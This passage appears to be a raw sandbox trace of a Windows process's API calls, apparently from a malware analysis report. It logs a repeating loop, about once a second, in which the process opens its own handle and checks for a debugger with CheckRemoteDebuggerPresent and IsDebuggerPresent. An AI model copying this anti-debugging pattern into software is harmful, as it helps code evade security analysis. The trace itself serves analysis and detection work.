returned 0x4d4 [0141.963] GetExitCodeProcess (in: hProcess=0x4d4, lpExitCode=0x2906eb4 | out: lpExitCode=0x2906eb4*=0x103) returned 1 [0141.963] CloseHandle (hObject=0x4d4) returned 1 [0141.963] OutputDebugStringW (lpOutputString="") [0142.975] GetCurrentProcessId () returned 0xf64 [0142.975] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4d8 [0142.975] GetExitCodeProcess (in: hProcess=0x4d8, lpExitCode=0x29070dc | out: lpExitCode=0x29070dc*=0x103) returned 1 [0142.975] CheckRemoteDebuggerPresent (in: hProcess=0x4d8, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0142.975] IsDebuggerPresent () returned 0 [0142.976] GetCurrentProcessId () returned 0xf64 [0142.976] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4dc [0142.976] GetExitCodeProcess (in: hProcess=0x4dc, lpExitCode=0x2907194 | out: lpExitCode=0x2907194*=0x103) returned 1 [0142.976] CloseHandle (hObject=0x4dc) returned 1 [0142.976] OutputDebugStringW (lpOutputString="") [0143.989] GetCurrentProcessId () returned 0xf64 [0143.989] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4e0 [0143.989] GetExitCodeProcess (in: hProcess=0x4e0, lpExitCode=0x29073bc | out: lpExitCode=0x29073bc*=0x103) returned 1 [0143.989] CheckRemoteDebuggerPresent (in: hProcess=0x4e0, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0143.989] IsDebuggerPresent () returned 0 [0143.990] GetCurrentProcessId () returned 0xf64 [0143.990] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4e4 [0143.990] GetExitCodeProcess (in: hProcess=0x4e4, lpExitCode=0x2907474 | out: lpExitCode=0x2907474*=0x103) returned 1 [0143.990] CloseHandle (hObject=0x4e4) returned 1 [0143.990] OutputDebugStringW (lpOutputString="") [0145.003] GetCurrentProcessId () returned 0xf64 [0145.003] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4e8 [0145.004] GetExitCodeProcess (in: hProcess=0x4e8, lpExitCode=0x290769c | out: lpExitCode=0x290769c*=0x103) returned 1 [0145.004] CheckRemoteDebuggerPresent (in: hProcess=0x4e8, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0145.004] IsDebuggerPresent () returned 0 [0145.004] GetCurrentProcessId () returned 0xf64 [0145.004] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4ec [0145.004] GetExitCodeProcess (in: hProcess=0x4ec, lpExitCode=0x2907754 | out: lpExitCode=0x2907754*=0x103) returned 1 [0145.005] CloseHandle (hObject=0x4ec) returned 1 [0145.005] OutputDebugStringW (lpOutputString="") [0146.017] GetCurrentProcessId () returned 0xf64 [0146.017] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4f0 [0146.017] GetExitCodeProcess (in: hProcess=0x4f0, lpExitCode=0x290797c | out: lpExitCode=0x290797c*=0x103) returned 1 [0146.018] CheckRemoteDebuggerPresent (in: hProcess=0x4f0, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0146.018] IsDebuggerPresent () returned 0 [0146.018] GetCurrentProcessId () returned 0xf64 [0146.018] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4f4 [0146.018] GetExitCodeProcess (in: hProcess=0x4f4, lpExitCode=0x2907a34 | out: lpExitCode=0x2907a34*=0x103) returned 1 [0146.018] CloseHandle (hObject=0x4f4) returned 1 [0146.018] OutputDebugStringW (lpOutputString="") [0147.032] GetCurrentProcessId () returned 0xf64 [0147.032] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4f8 [0147.032] GetExitCodeProcess (in: hProcess=0x4f8, lpExitCode=0x2907c5c | out: lpExitCode=0x2907c5c*=0x103) returned 1 [0147.032] CheckRemoteDebuggerPresent (in: hProcess=0x4f8, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0147.032] IsDebuggerPresent () returned 0 [0147.032] GetCurrentProcessId () returned 0xf64 [0147.032] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x4fc [0147.033] GetExitCodeProcess (in: hProcess=0x4fc, lpExitCode=0x2907d14 | out: lpExitCode=0x2907d14*=0x103) returned 1 [0147.033] CloseHandle (hObject=0x4fc) returned 1 [0147.033] OutputDebugStringW (lpOutputString="") [0148.060] GetCurrentProcessId () returned 0xf64 [0148.060] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x500 [0148.061] GetExitCodeProcess (in: hProcess=0x500, lpExitCode=0x2907f3c | out: lpExitCode=0x2907f3c*=0x103) returned 1 [0148.061] CheckRemoteDebuggerPresent (in: hProcess=0x500, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0148.061] IsDebuggerPresent () returned 0 [0148.061] GetCurrentProcessId () returned 0xf64 [0148.061] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x504 [0148.062] GetExitCodeProcess (in: hProcess=0x504, lpExitCode=0x2908000 | out: lpExitCode=0x2908000*=0x103) returned 1 [0148.062] CloseHandle (hObject=0x504) returned 1 [0148.062] OutputDebugStringW (lpOutputString="") [0149.102] GetCurrentProcessId () returned 0xf64 [0149.103] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x508 [0149.103] GetExitCodeProcess (in: hProcess=0x508, lpExitCode=0x2908228 | out: lpExitCode=0x2908228*=0x103) returned 1 [0149.103] CheckRemoteDebuggerPresent (in: hProcess=0x508, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0149.103] IsDebuggerPresent () returned 0 [0149.103] GetCurrentProcessId () returned 0xf64 [0149.103] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x50c [0149.103] GetExitCodeProcess (in: hProcess=0x50c, lpExitCode=0x29082e0 | out: lpExitCode=0x29082e0*=0x103) returned 1 [0149.104] CloseHandle (hObject=0x50c) returned 1 [0149.104] OutputDebugStringW (lpOutputString="") [0150.115] GetCurrentProcessId () returned 0xf64 [0150.115] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x510 [0150.115] GetExitCodeProcess (in: hProcess=0x510, lpExitCode=0x2908508 | out: lpExitCode=0x2908508*=0x103) returned 1 [0150.116] CheckRemoteDebuggerPresent (in: hProcess=0x510, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0150.116] IsDebuggerPresent () returned 0 [0150.116] GetCurrentProcessId () returned 0xf64 [0150.116] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x514 [0150.116] GetExitCodeProcess (in: hProcess=0x514, lpExitCode=0x29085c0 | out: lpExitCode=0x29085c0*=0x103) returned 1 [0150.116] CloseHandle (hObject=0x514) returned 1 [0150.116] OutputDebugStringW (lpOutputString="") [0151.128] GetCurrentProcessId () returned 0xf64 [0151.128] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x518 [0151.129] GetExitCodeProcess (in: hProcess=0x518, lpExitCode=0x29087e8 | out: lpExitCode=0x29087e8*=0x103) returned 1 [0151.129] CheckRemoteDebuggerPresent (in: hProcess=0x518, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0151.129] IsDebuggerPresent () returned 0 [0151.129] GetCurrentProcessId () returned 0xf64 [0151.129] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x51c [0151.129] GetExitCodeProcess (in: hProcess=0x51c, lpExitCode=0x29088a0 | out: lpExitCode=0x29088a0*=0x103) returned 1 [0151.129] CloseHandle (hObject=0x51c) returned 1 [0151.130] OutputDebugStringW (lpOutputString="") [0152.132] GetCurrentProcessId () returned 0xf64 [0152.132] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x520 [0152.132] GetExitCodeProcess (in: hProcess=0x520, lpExitCode=0x2908ac8 | out: lpExitCode=0x2908ac8*=0x103) returned 1 [0152.132] CheckRemoteDebuggerPresent (in: hProcess=0x520, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0152.132] IsDebuggerPresent () returned 0 [0152.132] GetCurrentProcessId () returned 0xf64 [0152.133] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x524 [0152.133] GetExitCodeProcess (in: hProcess=0x524, lpExitCode=0x2908b80 | out: lpExitCode=0x2908b80*=0x103) returned 1 [0152.133] CloseHandle (hObject=0x524) returned 1 [0152.133] OutputDebugStringW (lpOutputString="") [0153.146] GetCurrentProcessId () returned 0xf64 [0153.146] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x528 [0153.146] GetExitCodeProcess (in: hProcess=0x528, lpExitCode=0x2908da8 | out: lpExitCode=0x2908da8*=0x103) returned 1 [0153.147] CheckRemoteDebuggerPresent (in: hProcess=0x528, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0153.147] IsDebuggerPresent () returned 0 [0153.147] GetCurrentProcessId () returned 0xf64 [0153.147] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x52c [0153.147] GetExitCodeProcess (in: hProcess=0x52c, lpExitCode=0x2908e60 | out: lpExitCode=0x2908e60*=0x103) returned 1 [0153.147] CloseHandle (hObject=0x52c) returned 1 [0153.147] OutputDebugStringW (lpOutputString="") [0154.161] GetCurrentProcessId () returned 0xf64 [0154.161] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x530 [0154.162] GetExitCodeProcess (in: hProcess=0x530, lpExitCode=0x2909088 | out: lpExitCode=0x2909088*=0x103) returned 1 [0154.162] CheckRemoteDebuggerPresent (in: hProcess=0x530, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0154.162] IsDebuggerPresent () returned 0 [0154.162] GetCurrentProcessId () returned 0xf64 [0154.162] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x534 [0154.162] GetExitCodeProcess (in: hProcess=0x534, lpExitCode=0x2909140 | out: lpExitCode=0x2909140*=0x103) returned 1 [0154.163] CloseHandle (hObject=0x534) returned 1 [0154.163] OutputDebugStringW (lpOutputString="") [0155.174] GetCurrentProcessId () returned 0xf64 [0155.174] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x538 [0155.174] GetExitCodeProcess (in: hProcess=0x538, lpExitCode=0x2909368 | out: lpExitCode=0x2909368*=0x103) returned 1 [0155.175] CheckRemoteDebuggerPresent (in: hProcess=0x538, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0155.175] IsDebuggerPresent () returned 0 [0155.175] GetCurrentProcessId () returned 0xf64 [0155.175] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x53c [0155.175] GetExitCodeProcess (in: hProcess=0x53c, lpExitCode=0x2909420 | out: lpExitCode=0x2909420*=0x103) returned 1 [0155.176] CloseHandle (hObject=0x53c) returned 1 [0155.176] OutputDebugStringW (lpOutputString="") [0156.190] GetCurrentProcessId () returned 0xf64 [0156.190] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x540 [0156.191] GetExitCodeProcess (in: hProcess=0x540, lpExitCode=0x2909648 | out: lpExitCode=0x2909648*=0x103) returned 1 [0156.191] CheckRemoteDebuggerPresent (in: hProcess=0x540, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0156.191] IsDebuggerPresent () returned 0 [0156.191] GetCurrentProcessId () returned 0xf64 [0156.192] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x544 [0156.192] GetExitCodeProcess (in: hProcess=0x544, lpExitCode=0x2909700 | out: lpExitCode=0x2909700*=0x103) returned 1 [0156.192] CloseHandle (hObject=0x544) returned 1 [0156.192] OutputDebugStringW (lpOutputString="") [0157.202] GetCurrentProcessId () returned 0xf64 [0157.203] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x548 [0157.203] GetExitCodeProcess (in: hProcess=0x548, lpExitCode=0x2909928 | out: lpExitCode=0x2909928*=0x103) returned 1 [0157.203] CheckRemoteDebuggerPresent (in: hProcess=0x548, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0157.203] IsDebuggerPresent () returned 0 [0157.203] GetCurrentProcessId () returned 0xf64 [0157.204] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x54c [0157.204] GetExitCodeProcess (in: hProcess=0x54c, lpExitCode=0x29099e0 | out: lpExitCode=0x29099e0*=0x103) returned 1 [0157.204] CloseHandle (hObject=0x54c) returned 1 [0157.204] OutputDebugStringW (lpOutputString="") [0158.216] GetCurrentProcessId () returned 0xf64 [0158.216] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x550 [0158.216] GetExitCodeProcess (in: hProcess=0x550, lpExitCode=0x2909c08 | out: lpExitCode=0x2909c08*=0x103) returned 1 [0158.216] CheckRemoteDebuggerPresent (in: hProcess=0x550, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0158.216] IsDebuggerPresent () returned 0 [0158.216] GetCurrentProcessId () returned 0xf64 [0158.217] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x554 [0158.217] GetExitCodeProcess (in: hProcess=0x554, lpExitCode=0x2909cc0 | out: lpExitCode=0x2909cc0*=0x103) returned 1 [0158.217] CloseHandle (hObject=0x554) returned 1 [0158.217] OutputDebugStringW (lpOutputString="") [0159.231] GetCurrentProcessId () returned 0xf64 [0159.231] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x558 [0159.231] GetExitCodeProcess (in: hProcess=0x558, lpExitCode=0x2909ee8 | out: lpExitCode=0x2909ee8*=0x103) returned 1 [0159.231] CheckRemoteDebuggerPresent (in: hProcess=0x558, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0159.232] IsDebuggerPresent () returned 0 [0159.232] GetCurrentProcessId () returned 0xf64 [0159.232] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x55c [0159.232] GetExitCodeProcess (in: hProcess=0x55c, lpExitCode=0x2909fa0 | out: lpExitCode=0x2909fa0*=0x103) returned 1 [0159.232] CloseHandle (hObject=0x55c) returned 1 [0159.233] OutputDebugStringW (lpOutputString="") [0160.244] GetCurrentProcessId () returned 0xf64 [0160.244] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x560 [0160.244] GetExitCodeProcess (in: hProcess=0x560, lpExitCode=0x290a1d4 | out: lpExitCode=0x290a1d4*=0x103) returned 1 [0160.244] CheckRemoteDebuggerPresent (in: hProcess=0x560, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0160.245] IsDebuggerPresent () returned 0 [0160.245] GetCurrentProcessId () returned 0xf64 [0160.245] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x564 [0160.245] GetExitCodeProcess (in: hProcess=0x564, lpExitCode=0x290a28c | out: lpExitCode=0x290a28c*=0x103) returned 1 [0160.245] CloseHandle (hObject=0x564) returned 1 [0160.245] OutputDebugStringW (lpOutputString="") [0161.276] GetCurrentProcessId () returned 0xf64 [0161.276] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x568 [0161.277] GetExitCodeProcess (in: hProcess=0x568, lpExitCode=0x290a4b4 | out: lpExitCode=0x290a4b4*=0x103) returned 1 [0161.277] CheckRemoteDebuggerPresent (in: hProcess=0x568, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0161.277] IsDebuggerPresent () returned 0 [0161.277] GetCurrentProcessId () returned 0xf64 [0161.277] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x56c [0161.277] GetExitCodeProcess (in: hProcess=0x56c, lpExitCode=0x290a56c | out: lpExitCode=0x290a56c*=0x103) returned 1 [0161.278] CloseHandle (hObject=0x56c) returned 1 [0161.278] OutputDebugStringW (lpOutputString="") [0162.288] GetCurrentProcessId () returned 0xf64 [0162.289] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x570 [0162.289] GetExitCodeProcess (in: hProcess=0x570, lpExitCode=0x290a794 | out: lpExitCode=0x290a794*=0x103) returned 1 [0162.289] CheckRemoteDebuggerPresent (in: hProcess=0x570, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0162.289] IsDebuggerPresent () returned 0 [0162.289] GetCurrentProcessId () returned 0xf64 [0162.289] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x574 [0162.290] GetExitCodeProcess (in: hProcess=0x574, lpExitCode=0x290a84c | out: lpExitCode=0x290a84c*=0x103) returned 1 [0162.290] CloseHandle (hObject=0x574) returned 1 [0162.290] OutputDebugStringW (lpOutputString="") [0163.302] GetCurrentProcessId () returned 0xf64 [0163.303] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x578 [0163.303] GetExitCodeProcess (in: hProcess=0x578, lpExitCode=0x290aa74 | out: lpExitCode=0x290aa74*=0x103) returned 1 [0163.303] CheckRemoteDebuggerPresent (in: hProcess=0x578, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0163.303] IsDebuggerPresent () returned 0 [0163.303] GetCurrentProcessId () returned 0xf64 [0163.303] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x57c [0163.303] GetExitCodeProcess (in: hProcess=0x57c, lpExitCode=0x290ab2c | out: lpExitCode=0x290ab2c*=0x103) returned 1 [0163.303] CloseHandle (hObject=0x57c) returned 1 [0163.304] OutputDebugStringW (lpOutputString="") [0164.315] GetCurrentProcessId () returned 0xf64 [0164.316] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x580 [0164.316] GetExitCodeProcess (in: hProcess=0x580, lpExitCode=0x290ad54 | out: lpExitCode=0x290ad54*=0x103) returned 1 [0164.316] CheckRemoteDebuggerPresent (in: hProcess=0x580, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0164.316] IsDebuggerPresent () returned 0 [0164.316] GetCurrentProcessId () returned 0xf64 [0164.316] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x584 [0164.316] GetExitCodeProcess (in: hProcess=0x584, lpExitCode=0x290ae0c | out: lpExitCode=0x290ae0c*=0x103) returned 1 [0164.317] CloseHandle (hObject=0x584) returned 1 [0164.317] OutputDebugStringW (lpOutputString="") [0165.427] GetCurrentProcessId () returned 0xf64 [0165.427] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x588 [0165.427] GetExitCodeProcess (in: hProcess=0x588, lpExitCode=0x290b034 | out: lpExitCode=0x290b034*=0x103) returned 1 [0165.427] CheckRemoteDebuggerPresent (in: hProcess=0x588, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0165.428] IsDebuggerPresent () returned 0 [0165.428] GetCurrentProcessId () returned 0xf64 [0165.428] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x58c [0165.428] GetExitCodeProcess (in: hProcess=0x58c, lpExitCode=0x290b0ec | out: lpExitCode=0x290b0ec*=0x103) returned 1 [0165.428] CloseHandle (hObject=0x58c) returned 1 [0165.428] OutputDebugStringW (lpOutputString="") [0166.444] GetCurrentProcessId () returned 0xf64 [0166.444] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x590 [0166.444] GetExitCodeProcess (in: hProcess=0x590, lpExitCode=0x290b314 | out: lpExitCode=0x290b314*=0x103) returned 1 [0166.444] CheckRemoteDebuggerPresent (in: hProcess=0x590, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0166.444] IsDebuggerPresent () returned 0 [0166.444] GetCurrentProcessId () returned 0xf64 [0166.444] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x594 [0166.445] GetExitCodeProcess (in: hProcess=0x594, lpExitCode=0x290b3cc | out: lpExitCode=0x290b3cc*=0x103) returned 1 [0166.445] CloseHandle (hObject=0x594) returned 1 [0166.445] OutputDebugStringW (lpOutputString="") [0168.232] GetCurrentProcessId () returned 0xf64 [0168.232] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x598 [0168.232] GetExitCodeProcess (in: hProcess=0x598, lpExitCode=0x290b5f4 | out: lpExitCode=0x290b5f4*=0x103) returned 1 [0168.232] CheckRemoteDebuggerPresent (in: hProcess=0x598, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0168.233] IsDebuggerPresent () returned 0 [0168.233] GetCurrentProcessId () returned 0xf64 [0168.233] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x59c [0168.233] GetExitCodeProcess (in: hProcess=0x59c, lpExitCode=0x290b6ac | out: lpExitCode=0x290b6ac*=0x103) returned 1 [0168.233] CloseHandle (hObject=0x59c) returned 1 [0168.233] OutputDebugStringW (lpOutputString="") [0169.760] GetCurrentProcessId () returned 0xf64 [0169.760] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x384 [0169.760] GetExitCodeProcess (in: hProcess=0x384, lpExitCode=0x290ba44 | out: lpExitCode=0x290ba44*=0x103) returned 1 [0169.760] CheckRemoteDebuggerPresent (in: hProcess=0x384, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0169.760] IsDebuggerPresent () returned 0 [0169.760] GetCurrentProcessId () returned 0xf64 [0169.760] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5a0 [0169.761] GetExitCodeProcess (in: hProcess=0x5a0, lpExitCode=0x290bafc | out: lpExitCode=0x290bafc*=0x103) returned 1 [0169.761] CloseHandle (hObject=0x5a0) returned 1 [0169.761] OutputDebugStringW (lpOutputString="") [0175.077] GetCurrentProcessId () returned 0xf64 [0175.077] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5a4 [0175.077] GetExitCodeProcess (in: hProcess=0x5a4, lpExitCode=0x290bd24 | out: lpExitCode=0x290bd24*=0x103) returned 1 [0175.077] CheckRemoteDebuggerPresent (in: hProcess=0x5a4, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0175.077] IsDebuggerPresent () returned 0 [0175.077] GetCurrentProcessId () returned 0xf64 [0175.078] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5a8 [0175.078] GetExitCodeProcess (in: hProcess=0x5a8, lpExitCode=0x290bddc | out: lpExitCode=0x290bddc*=0x103) returned 1 [0175.078] CloseHandle (hObject=0x5a8) returned 1 [0175.078] OutputDebugStringW (lpOutputString="") [0176.078] GetCurrentProcessId () returned 0xf64 [0176.078] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5ac [0176.078] GetExitCodeProcess (in: hProcess=0x5ac, lpExitCode=0x290c010 | out: lpExitCode=0x290c010*=0x103) returned 1 [0176.078] CheckRemoteDebuggerPresent (in: hProcess=0x5ac, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0176.079] IsDebuggerPresent () returned 0 [0176.079] GetCurrentProcessId () returned 0xf64 [0176.079] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5b0 [0176.079] GetExitCodeProcess (in: hProcess=0x5b0, lpExitCode=0x290c0c8 | out: lpExitCode=0x290c0c8*=0x103) returned 1 [0176.079] CloseHandle (hObject=0x5b0) returned 1 [0176.079] OutputDebugStringW (lpOutputString="") [0177.161] GetCurrentProcessId () returned 0xf64 [0177.161] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5b4 [0177.161] GetExitCodeProcess (in: hProcess=0x5b4, lpExitCode=0x290c2f0 | out: lpExitCode=0x290c2f0*=0x103) returned 1 [0177.161] CheckRemoteDebuggerPresent (in: hProcess=0x5b4, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0177.161] IsDebuggerPresent () returned 0 [0177.161] GetCurrentProcessId () returned 0xf64 [0177.161] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5b8 [0177.161] GetExitCodeProcess (in: hProcess=0x5b8, lpExitCode=0x290c3a8 | out: lpExitCode=0x290c3a8*=0x103) returned 1 [0177.161] CloseHandle (hObject=0x5b8) returned 1 [0177.162] OutputDebugStringW (lpOutputString="") [0178.184] GetCurrentProcessId () returned 0xf64 [0178.184] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5bc [0178.184] GetExitCodeProcess (in: hProcess=0x5bc, lpExitCode=0x290c5d0 | out: lpExitCode=0x290c5d0*=0x103) returned 1 [0178.184] CheckRemoteDebuggerPresent (in: hProcess=0x5bc, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0178.184] IsDebuggerPresent () returned 0 [0178.185] GetCurrentProcessId () returned 0xf64 [0178.185] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5c0 [0178.185] GetExitCodeProcess (in: hProcess=0x5c0, lpExitCode=0x290c688 | out: lpExitCode=0x290c688*=0x103) returned 1 [0178.185] CloseHandle (hObject=0x5c0) returned 1 [0178.185] OutputDebugStringW (lpOutputString="") [0179.199] GetCurrentProcessId () returned 0xf64 [0179.199] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5c4 [0179.199] GetExitCodeProcess (in: hProcess=0x5c4, lpExitCode=0x290c8b0 | out: lpExitCode=0x290c8b0*=0x103) returned 1 [0179.199] CheckRemoteDebuggerPresent (in: hProcess=0x5c4, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0179.199] IsDebuggerPresent () returned 0 [0179.200] GetCurrentProcessId () returned 0xf64 [0179.200] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5c8 [0179.200] GetExitCodeProcess (in: hProcess=0x5c8, lpExitCode=0x290c968 | out: lpExitCode=0x290c968*=0x103) returned 1 [0179.200] CloseHandle (hObject=0x5c8) returned 1 [0179.200] OutputDebugStringW (lpOutputString="") [0180.222] GetCurrentProcessId () returned 0xf64 [0180.223] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5cc [0180.223] GetExitCodeProcess (in: hProcess=0x5cc, lpExitCode=0x290cb90 | out: lpExitCode=0x290cb90*=0x103) returned 1 [0180.223] CheckRemoteDebuggerPresent (in: hProcess=0x5cc, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0180.223] IsDebuggerPresent () returned 0 [0180.223] GetCurrentProcessId () returned 0xf64 [0180.223] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5d0 [0180.223] GetExitCodeProcess (in: hProcess=0x5d0, lpExitCode=0x290cc48 | out: lpExitCode=0x290cc48*=0x103) returned 1 [0180.224] CloseHandle (hObject=0x5d0) returned 1 [0180.224] OutputDebugStringW (lpOutputString="") [0181.231] GetCurrentProcessId () returned 0xf64 [0181.231] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x5d4 [0181.231] GetExitCodeProcess (in: hProcess=0x5d4, lpExitCode=0x290ce70 | out: lpExitCode=0x290ce70*=0x103) returned 1 [0181.231] 